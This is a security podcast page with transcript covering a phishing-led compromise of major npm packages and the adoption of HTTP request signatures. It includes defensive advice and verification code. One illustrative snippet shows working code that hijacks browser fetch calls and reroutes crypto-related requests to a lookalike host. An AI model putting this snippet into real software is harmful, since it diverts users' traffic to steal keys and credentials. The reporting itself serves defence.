Podcast Detail

SANS Stormcast Tuesday, September 9th, 2025: Major npm compromise; HTTP Request Signature

If you are not able to play the podcast, use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9604.mp3

Major npm compromise
A number of high-profile npm libraries were compromised after their developers fell for a phishing email. The compromise affected libraries with a combined total of hundreds of millions of downloads per week.
https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydioq5swk2y
https://github.com/orgs/community/discussions/172738
https://github.com/chalk/chalk/issues/656#issuecomment-3266894253
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

HTTP Request Signatures
It looks like some search engines and AI bots are starting to use HTTP request signatures. This should make it easier to identify bot traffic.
https://isc.sans.edu/diary/HTTP%20Request%20Signatures/32266

Podcast Transcript

Hello and welcome to the Tuesday, September 9th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu graduate certificate program in Industrial Control Systems Security.

Today I want to do things a little bit differently. Usually I start with the diary of the day, but there has been a major compromise of npm libraries, so I want to give that a somewhat more prominent position. The issue here is that one developer in particular, Josh Junon, who goes on npm under the name Qix, has been affected by this compromise. And as a result, some major, major npm libraries have been compromised: for example, the error-ex library with 47 million downloads per week, or color-name with 199 million downloads per week. Many, many other libraries in the millions-of-downloads-per-week range have been compromised and infected, if you want to call it that, or substituted with versions that include browser-hijacking functions. The hijacked libraries essentially intercept calls to XMLHttpRequest and fetch. They look for requests going to cryptocurrency-related domains and replace them with lookalike domains, with the goal of intercepting cryptocurrency keys, usernames, passwords, and the like. That appears to be the main motivation behind this attack.
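To make the technique concrete, here is a minimal sketch of the kind of fetch interception described above. It is written for this write-up, not taken from the actual payload; the domains in the lookup table are invented.

    // Minimal sketch of the hijacking technique described above (illustrative
    // only). XMLHttpRequest can be wrapped the same way by patching
    // XMLHttpRequest.prototype.open.
    const realFetch = window.fetch.bind(window);

    // Hypothetical lookup table: legitimate crypto-related host -> lookalike.
    const lookalikes: Record<string, string> = {
      "api.wallet-example.com": "api.wallet-examp1e.com", // both hosts made up
    };

    window.fetch = (input: RequestInfo | URL, init?: RequestInit) => {
      const url = new URL(
        input instanceof Request ? input.url : input.toString(),
        location.href
      );
      const target = lookalikes[url.hostname];
      if (target) {
        url.hostname = target; // silently reroute to the lookalike host
        return realFetch(url.toString(), init);
      }
      return realFetch(input, init);
    };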
Now, how can something like this happen to a major developer like this? Well, the problem here was, yet again, phishing. The email came from support@npmjs.help. The legitimate domain would be the .com domain, but of course the attacker owns npmjs.help, and with that they were able to send these emails without typically triggering any spam filters. The domain npmjs.help was registered relatively recently, and it was then used to get passwords not just from Qix, but also from other prominent, and of course also less prominent, npm developers, and all of these accounts were compromised. It was not just the one account; Josh's account was simply the most prominent one, with all the popular libraries that Josh maintains and has access to.

How do you defend against this? Well, I'm going to add a link in the show notes to aikido.dev. That's one website that wrote about this particular attack, and theirs was one of the tools that detected it. They weren't the only ones: I think Snyk also published something and blocked some of these as well, and Sonatype may have done some of that too. It's all still pretty new at the point when I'm recording this, but more than one tool was able to detect what exactly happened here.
And what happened was fairly obvious if you look at it: an obfuscated line was added to these packages. It was a sort of constant, with hexadecimal-looking variable names.
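For illustration, that style looks roughly like this; the identifier and contents are invented for this write-up, not the actual payload.

    // Hypothetical illustration of the obfuscation style described above: a
    // single appended line defining a constant, with hex-style identifiers.
    const _0x3c8a2e = (function (_0x45ab1c: string) {
      return _0x45ab1c; // the real payload decoded and installed the hijack here
    })("...opaque encoded blob...");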
Certainly something that probably should have raised people's spidey senses if you looked at the code, but of course nobody can really review all of this code manually. That's why these tools are important.
And the compromised code shipped as new versions of these packages, so if you lock in your versions, that sort of can help. And then, you know, update more deliberately, after a particular new version has been live for a little while and the community has had a chance to raise alerts like this about any compromised libraries.
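As a sketch of the version-locking part of that defense: exact versions in package.json (no ^ or ~ ranges), together with a committed lockfile, mean a freshly published malicious version is not pulled in automatically. The package names below are from this incident, but the version numbers are placeholders.

    {
      "dependencies": {
        "chalk": "1.2.3",
        "debug": "1.2.3"
      },
      "overrides": {
        "color-name": "1.2.3"
      }
    }

The overrides block pins a transitive dependency to a known-good version, and installing with npm ci reproduces exactly what the lockfile records instead of resolving version ranges again.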
The technique is very common; the phishing is very common with prior npm compromises. Just in this particular case, they got more lucky by actually hitting some real big-time libraries.
And well, it's not every day that, when we talk about HTTP and our honeypots, we are talking not about a new attack but about a new security feature. For the first time now, we have seen requests in our honeypots with the HTTP request signature headers. This is a relatively new feature that was standardized in an RFC in February last year, and it introduces three new headers: Signature-Input, Signature-Agent, and Signature. The purpose of this feature is to allow the source, the client, to digitally sign part of or the entire request. In what we have seen, basically just the host header is being digitally signed, but it could, for example, also include a signature for the user-agent header and the like.
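For illustration, a signed request along these lines could look as follows. The key ID, timestamp, agent URL, and signature value are all invented, not copied from our honeypot; the Signature-Input and Signature syntax follows RFC 9421 (HTTP Message Signatures).

    GET / HTTP/1.1
    Host: example.com
    Signature-Agent: "https://signer.example"
    Signature-Input: sig1=("@authority" "signature-agent");created=1757376000;keyid="test-key-ed25519";alg="ed25519"
    Signature: sig1=:dGhpcyBpcyBub3QgYSByZWFsIHNpZ25hdHVyZSwganVzdCBhIHBsYWNlaG9sZGVyLg==: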
And the reason behind this is: we do have TLS, of course, and TLS can be used with client certificates to make sure that a request comes from an authorized client. But what this is trying to solve is that when you have search engines and, in particular, other bots spidering the Internet and interacting with your web server, it can be difficult for the server to identify which bot sent a particular request. For example, Google has its user-agent header, but of course that alone is not sufficient to verify that a request comes from Google. We also have to reverse-resolve the IP address and make sure it's actually a Google-owned IP address, and one that Google uses for its bots. With Google, that works pretty well.
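That Google check can be sketched like this in Node. The procedure itself (reverse lookup, name check, forward confirmation) is the commonly documented approach; the helper below is just an IPv4 sketch written for this write-up.

    // Sketch of the classic Googlebot verification described above:
    // reverse-resolve the client IP, require a googlebot.com / google.com
    // name, then forward-resolve that name and confirm it maps back.
    import { promises as dns } from "node:dns";

    async function isGooglebot(ip: string): Promise<boolean> {
      try {
        const names = await dns.reverse(ip); // PTR lookup
        for (const name of names) {
          if (!/\.(googlebot|google)\.com$/i.test(name)) continue;
          const addrs = await dns.resolve4(name); // forward confirmation
          if (addrs.includes(ip)) return true;
        }
      } catch {
        // lookup failures (no PTR record, timeouts, ...) mean "not verified"
      }
      return false;
    }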
But of course, that's not a standard, and it doesn't really work well with some of the smaller players among search engines, or now also AI agents, for example, that are starting to spider the Internet more and more. So what this feature allows is digital signatures for headers, and also for the entire request, although typically it's limited to specific headers. What we have seen here in our example was a request that really just signed the authority header, which is the host header, and then the signature-agent header, which is the header that tells you where to get the keys from. If you want to allow specific bots to spider your site, you can use this mechanism to make sure that a bot is actually one of these authorized bots. You don't have to rely on IP addresses, and you don't have to rely on user-agent headers, all of which can be tricky to figure out. In particular, if the request goes through multiple proxies, the original IP address often gets lost, or gets added to an untrusted header like the X-Forwarded-For header, which you shouldn't really use to identify the source of a particular request.
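To sketch what verification might look like on the server side, under some simplifying assumptions: the bot signs with Ed25519, only @authority and signature-agent are covered (as in the example above), and fetching the public key from the Signature-Agent URL happens elsewhere. The RFC's full signature-base rules are reduced here to the two components actually used.

    // Simplified verification sketch for a request like the example above.
    import { createPublicKey, verify } from "node:crypto";

    // Rebuild the signature base: each covered component on its own line,
    // followed by the @signature-params line.
    function signatureBase(authority: string, agent: string, params: string): string {
      return [
        `"@authority": ${authority}`,
        `"signature-agent": ${agent}`,
        `"@signature-params": ${params}`,
      ].join("\n");
    }

    function verifyRequest(
      authority: string,    // Host header value, e.g. "example.com"
      agent: string,        // Signature-Agent header value
      params: string,       // everything after "sig1=" in Signature-Input
      signatureB64: string, // the base64 between the colons in Signature
      publicKeyPem: string  // key fetched from the Signature-Agent URL
    ): boolean {
      const base = signatureBase(authority, agent, params);
      // Ed25519: the digest algorithm argument is null for this key type.
      return verify(
        null,
        Buffer.from(base, "utf8"),
        createPublicKey(publicKeyPem),
        Buffer.from(signatureB64, "base64")
      );
    }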
So, an interesting feature, and interesting to also see it now being used in real life, even though I haven't really seen the big players using it yet. I've seen some notes that OpenAI is using it, which I personally haven't seen yet, but I also haven't looked that closely at OpenAI requests. Well, and that's it for today. So thanks again for listening, thanks for liking, and thanks for recommending this podcast, and talk to you again tomorrow. Bye.